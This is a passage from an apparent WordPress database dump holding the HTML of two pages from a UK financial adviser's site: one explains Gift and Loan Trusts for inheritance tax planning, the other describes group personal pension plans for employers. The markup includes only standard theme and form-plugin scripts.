href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-141 current_page_item menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Gift &amp; Loan Trust										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/trusts\" title=\"Trusts\">Trusts</a></li><li>Gift &amp; Loan Trust</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-141\" class=\"post-141 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Gift &amp; Loan Trust</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h4 class=\"mceTemp\" style=\"text-align: justify;\">A Gift and Loan Trust, which are also known as Loan Schemes, are a popular way of reducing your Inheritance Tax liability without losing access to the capital.</h4>&#13;\n<p style=\"text-align: center;\"/>&#13;\n<h6 style=\"text-align: center;\"><em>A Gift and Loan Trust (or Loan Scheme) is generally suitable for people who want to retain access to their capital, but do not want their estate to increase in value any further.</em></h6>&#13;\n<p>How it works:</p>&#13;\n<ul><li>You establish a trust, and loan the trust money.</li>&#13;\n<li>The trustees invest this money.</li>&#13;\n<li>You reserve the right to have the loan paid back in full, or have partial repayments.</li>&#13;\n<li>Any growth on the loan falls outside of the value of the estate on death.</li>&#13;\n<li>The amount of loan not repaid on death forms part of the deceased’s estate.</li>&#13;\n<li>The main advantage is that it puts further growth on money outside of the estate.</li>&#13;\n</ul><p>Below shows how the loan trust would work, one based on taking repayments to use as income, and one with no repayments of the loan. It assumes that the £100,000 grows over five years to £150,000. Please note this should not be taken to imply this level of growth would be achieved. It is purely to illustrate the potential benefits of this type of scheme.</p>&#13;\n<table width=\"550\" cellspacing=\"0\" cellpadding=\"2\"><tbody><tr><td width=\"220\"/>&#13;\n<td bgcolor=\"#cccccc\" width=\"77\">No Loan Scheme</td>&#13;\n<td bgcolor=\"#cccccc\" width=\"103\">Loan Scheme – no repayments</td>&#13;\n<td bgcolor=\"#cccccc\" width=\"130\">Loan Scheme – repayments at £5k pa</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Original Investment</td>&#13;\n<td width=\"77\">£100,000</td>&#13;\n<td width=\"103\">£100,000</td>&#13;\n<td width=\"130\">£100,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Original Investment &amp; Growth after 5 yrs</td>&#13;\n<td width=\"77\">£150,000</td>&#13;\n<td width=\"103\">£150,000</td>&#13;\n<td width=\"130\">£120,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">* Repayments made</td>&#13;\n<td width=\"77\">n/a</td>&#13;\n<td width=\"103\">n/a</td>&#13;\n<td width=\"130\">£25,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Loan amount outstanding and potentially liable to IHT</td>&#13;\n<td width=\"77\">n/a</td>&#13;\n<td width=\"103\">£100,000</td>&#13;\n<td width=\"130\">£75,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Amount which escapes IHT</td>&#13;\n<td width=\"77\">£0</td>&#13;\n<td width=\"103\">£50,000</td>&#13;\n<td width=\"130\">£65,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Amount potentially liable to IHT</td>&#13;\n<td width=\"77\">£150,000</td>&#13;\n<td width=\"103\">£100,000</td>&#13;\n<td width=\"130\">£75,000</td>&#13;\n</tr><tr><td bgcolor=\"#e6e6e6\">Maximum amount of IHT</td>&#13;\n<td>£60,000</td>&#13;\n<td>£40,000</td>&#13;\n<td>£30,000</td>&#13;\n</tr></tbody></table><p>*Please note the amount of growth after five years is only £120,000 as this assumes £5,000 of the fund has been taken out and used as income each year.</p>&#13;\n<p>A Gift and Loan Trust (or Loan Scheme) is generally suitable for people who want to retain access to their capital, but do not want their estate to increase in value any further.</p>&#13;\n<p>These are just two of the methods available to reduce your Inheritance Tax liability. There are other strategies that can remove IHT liabilities after only two years, or provide limited but flexible access to capital that has been placed into trust without being considered a gift with reservation.</p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:f8f8f8 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>FREE 20 Minute Adviser Consultation</h2><p>Click the button to book yours now...</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div>&#13;\n<h4 class=\"content-box-gray\" style=\"text-align: left;\"/>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/trusts\" title=\"Back to Parent Page\">Trusts</a></li>&#13;\n						<li class=\"page_item page-item-109\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n<li class=\"page_item page-item-106\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n<li class=\"page_item page-item-111\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n<li class=\"page_item page-item-141 current_page_item\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n<li class=\"page_item page-item-144\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Gift &amp; Loan Trust | Loan Schemes','A Gift and Loan trust, also known as Loan Schemes, with our TRUSTS expertise you could have flexible access to your capital whilst achieving IHT savings...','publish','closed','closed','','gift-loan-trust-loan-schemes','','','2017-09-21 16:34:31','2017-09-21 16:34:31','',0,'http://www.equalitywalk.org.uk/gift-loan-trust-loan-schemes',0,'page','',0),(69,1,'2017-09-21 16:34:31','2017-09-21 16:34:31','<body class=\"page page-id-131 page-child parent-pageid-25 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-131 current_page_item menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Group Pension Plan										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/pensions\" title=\"Pensions\">Pensions</a></li><li>Group Pension Plan</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-131\" class=\"post-131 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Group Pension Plan</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><a href=\"#\"/>As an employer, the world of pensions often appears confusing and complex as well as being a minefield of information.</p>&#13;\n<p>But by providing a pension scheme an employer has one of the most important ways to motivate and<br/>&#13;\nretain staff.</p>&#13;\n<p>What is a Group Personal Pension Scheme?</p>&#13;\n<p>A group personal pension (GPP) plan is a registered pension scheme. It is a collection of individual personal plans grouped together by the pension provider. Personal pensions offer a wide choice of funds in which to invest. The two options are:</p>&#13;\n<p>With-profit - contributions are invested in equities and gilt-edged securities. The value of the fund grows as bonuses are added.</p>&#13;\n<p>Bonuses reflect stock market performance and other factors, such as administration charges. The provider smoothes returns so that some gain in a good year is held back to boost performance in a bad year.</p>&#13;\n<p>Unit-linked - Contributions buy units in the chosen funds, which then increase or decrease according to the performance of their investments. The value of these investments reflect market performance.</p>&#13;\n<p>If you offer all your employees access to a GPP, you will be exempt from the requirement to designate a stakeholder pension scheme, providing that:</p>&#13;\n<p>You contribute an amount equal to at least 3% of your employees’ earnings</p>&#13;\n<p>You deduct employees’ contributions from their pay &amp; give them access to the pensions provider if requested</p>&#13;\n<p>[catlist id=4]</p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/pensions\" title=\"Back to Parent Page\">Pensions</a></li>&#13;\n						<li class=\"page_item page-item-134\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n<li class=\"page_item page-item-131 current_page_item\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n<li class=\"page_item page-item-137\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n<li class=\"page_item page-item-125\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n<li class=\"page_item page-item-90\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n<li class=\"page_item page-item-707\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n<li class=\"page_item page-item-189\"><a href=\"/pensions/personal-pensions\">Personal Pensions</a></li>&#13;\n<li class=\"page_item page-item-93\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n<li class=\"page_item page-item-103\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error 